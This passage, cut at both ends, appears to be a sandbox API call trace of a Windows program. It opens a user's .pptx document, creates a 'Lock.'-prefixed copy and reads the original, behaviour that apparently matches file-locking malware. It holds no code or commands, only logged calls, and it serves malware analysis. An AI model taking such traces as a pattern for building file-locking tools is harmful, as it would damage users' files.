returned 0 [0215.383] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/cyaer-G0v.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\cyaer-g0v.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.383] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.384] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b00 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.385] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b00 | out: hHeap=0x2af0000) returned 1 [0215.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0215.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.cyaer-G0v.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.cyaer-g0v.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.387] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0215.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.387] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0215.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0215.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e6020 [0215.391] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.391] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x285b, lpOverlapped=0x0) returned 1 [0215.393] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x285b) returned 0x3867020 [0215.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e6020 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x285b) returned 0x3869888 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0215.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.396] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x285b) returned 0x3867020 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0215.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0215.397] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0215.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x285b) returned 0x3867020 [0215.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0215.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x285b) returned 0x2a8a138 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0215.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0215.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0215.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.400] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0215.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0215.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.402] RtlAllocateHeap (HeapHandle=0x2af0000, 